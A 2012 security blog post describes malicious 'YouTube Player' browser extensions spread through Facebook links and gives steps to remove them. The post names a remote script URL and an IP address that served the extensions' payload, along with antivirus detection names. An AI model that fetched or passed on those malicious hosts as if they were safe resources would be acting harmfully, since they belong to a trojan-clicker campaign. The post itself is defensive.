Malware Removal Instructions

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Wednesday, 11 January 2012

Malicious Youtube Extension, YXH-youtube_player.xpi and YXH-youtube_player.crx (Uninstall Guide)

Posted on 15:56 by Unknown
Cyber criminals have spammed out malicious web browser extension attack posing as Youtube Player. Malicious web browser extensions called YXH-youtube_player.xpi and YXH-youtube_player.crx that infect Mozilla Firefox and Google Chrome are currently spreading through Facebook. Attackers rely mostly on social engineering attacks to spread their malicious extensions. This noxious campaign becomes a lot worse when infected users post links on websites that are using Facebook Comments Box. At least those links that lead to fake youtube websites are non-clickable.



The bit.ly link redirects users to a website impersonating youtube.com. The user is then prompted via a pop-up screen to click a notification and then install a Youtube HD Player.



Actually, you don't even need to click a notification, a download of malicious extension starts automatically.



It goes without saying that you shouldn't install add-ons from websites that you don't trust. Unfortunately, it seems that people are willing to do whatever it takes to watch videos that have caught their attention. After all, this is what social engineering attacks are all about.

YXH-youtube_player.crx (Youtube Player 6.1.8) extension installed in Google Chrome:



Extensions's files:



Let's take a look inside go.js to see how key functions are implemented.


As you can see, it calls another javascript file http://bbpeonf.info/script.js which at the moment we investigated this threat redirected us to 50.56.234.67/s.js.


The malicious browser extension YXH-youtube_player.xpi is currently detected by only 2 out of the 42 antivirus engines available on Virus Total. VT report YXH-youtube_player.xpi. ESET detects this extension as JS/TrojanClicker.Agent.NDA and Fortinet detects it as W32/Agent.FBH!phish.

As far as I know programs classified as JS.Trojan-Clicker are designed to increase the number of visits to certain sites in order to boost the number of hits for online ads, conduct Denial of Service attacks on a particular servers or simply redirect victims to infected websites. One way or another, you need to remove such malicious web browser extensions from your computer immediately. To remove JS/TrojanClicker.Agent.NDA from your computer, please follow the removal instructions below. If you have any questions, please leave a comment below. Good luck and be safe online!

Remove YXH-youtube_player.xpi in Mozilla Firefox:

1. Open Mozilla Firefox. Go to Tools → Add-ons.



2. Select Extensions. Choose Youtube Player 6.1.8 and click Uninstall button.



Remove YXH-youtube_player.crx in Google Chrome:

1. Click on Customize and control Google Chrome icon and select Tools → Extensions.



2. Choose Youtube Player 6.1.8 and click Remove button.



Finally, scan your computer with anti-malware software.

Associated Youtube Player 6.1.8 files:
  • C:\Documents and Settings\[User]\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jsgfrtofdhsjrelrjmspsjrtdcrslsjsnrt\6.1.8_0
  • C:\Documents and Settings\[User]\Application Data\Mozilla\Firefox\Profiles\o45jfr56.default\extensions\admin@youtubeplayer.com
Share this information with your friends:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in Trojans | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • What is wrtc.exe and how to remove it?
    wrtc.exe - by Perion Network Ltd. What is wrtc.exe? wrtc.exe is a part of IncrediMail software, digitally signed by Perion Network Ltd. This...
  • Remove ShopperReports (Uninstall Guide)
    ShopperReports is defined as adware or a potentially unwanted program that displays marketing related results in a side pane of the browser...
  • Trojan.MBRlock, Внимание! Ваш компьютер заблокирован
    Trojan.MBRlock is a very disturbing piece of malicious code which infects the master boot record (MBR) and prevents Windows from starting. ...
  • False Positive: Ikarus and Comodo detecting TDSSKiller as a Trojan horse
    This awkward moment when you realize that your favorite rootkit removal utility is detected as malware. I probably wouldn't even have no...
  • Remove RiskTool.Win32.BitCoinMiner (Uninstall Guide)
    RiskTool.Win32.BitCoinMiner is a risk tool or potentially unwanted application that may use your computer's resources to generate bitco...
  • Remove Rattlingsearchsystem.com (Uninstall Guide)
    Rattlingsearchsystem.com is a ZeroAccess/Sirefef rootkit-related browser hijacker that redirects users to shady websites while searching on...
  • Remove TR/ATRAPS.Gen2, removal instructions
    Cyber crooks and third parties that buy stolen data are increasingly using more and more sophisticated techniques, in a variety of different...
  • Remove Ask Search and Ask Toolbar (Uninstall Guide)
    Ask Search and Ask Toolbar are very often incorrectly classified as virus/spyware that may cause search redirects. The majority of us pref...
  • How to remove 'TidyNetwork' adware virus from your computer
    As internet users most of us have seen those irritating little pop-up windows that are advertising something that we normally have little or...
  • Remove Windows Attention Utility (Uninstall Guide)
    Windows Attention Utility is a rogue security application that generates misleading warnings about nonexistent viruses and attempts to lure...

Categories

  • Adware
  • Answers
  • Antivirus software
  • Browser Hijackers
  • Cloud Computing
  • Fake Alerts
  • Giveaways
  • Hoax
  • How-To
  • IaaS
  • Internet
  • Malicious websites
  • Malware
  • PaaS
  • Parental Controls
  • Passwords
  • Phishing
  • Process Information
  • Ransomware
  • Rogue programs
  • Rootkits
  • SaaS
  • Security Advisories
  • Spam
  • Spyware
  • Trojans
  • Viruses
  • Web Browsers
  • Worms

Blog Archive

  • ►  2013 (173)
    • ►  December (6)
    • ►  November (13)
    • ►  October (11)
    • ►  September (20)
    • ►  August (4)
    • ►  July (17)
    • ►  June (31)
    • ►  May (25)
    • ►  April (15)
    • ►  March (17)
    • ►  February (7)
    • ►  January (7)
  • ▼  2012 (86)
    • ►  November (2)
    • ►  October (4)
    • ►  September (6)
    • ►  August (6)
    • ►  July (11)
    • ►  June (1)
    • ►  May (5)
    • ►  April (7)
    • ►  March (7)
    • ►  February (17)
    • ▼  January (20)
      • Youtube PREMIUM Player, Free Facebook Credits and ...
      • How to Remove Searchqu (Uninstall Guide)
      • Remove RiskTool.Win32.BitCoinMiner (Uninstall Guide)
      • Bitdefender Internet Security 2012 Giveaway! Hurry...
      • Antivirus Smart Protection and Malware Protection ...
      • Remove "Smart Protection 2012" (Uninstall Guide)
      • Remove "Internet Security 2012" Malware (Uninstall...
      • Temp:winupd.exe (Uninstall Guide)
      • Search.conduit.com (Uninstall Guide) - How To Remo...
      • PUP.CNET.Adware.Bundle (Uninstall Guide)
      • Remove Internet Security Guard (Uninstall Guide)
      • Remove Guardia di Finanza Ransomware (Uninstall Gu...
      • Remove Strathclyde Police Ransomware (Uninstall Gu...
      • Malicious Youtube Extension, YXH-youtube_player.xp...
      • Remove Audio Ads Virus (Uninstall Guide)
      • Msdcsc.exe Process Information
      • Remove EoRezo Adware/PUP (Uninstall Guide)
      • Remove BasicScan (Uninstall Guide)
      • Be A Guest Writer
      • Remove Tidserv Activity 2 (Uninstall Guide)
  • ►  2011 (239)
    • ►  December (8)
    • ►  November (18)
    • ►  October (21)
    • ►  September (24)
    • ►  August (28)
    • ►  July (32)
    • ►  June (16)
    • ►  May (23)
    • ►  April (15)
    • ►  March (16)
    • ►  February (9)
    • ►  January (29)
  • ►  2010 (2)
    • ►  December (2)
Powered by Blogger.

About Me

Unknown
View my complete profile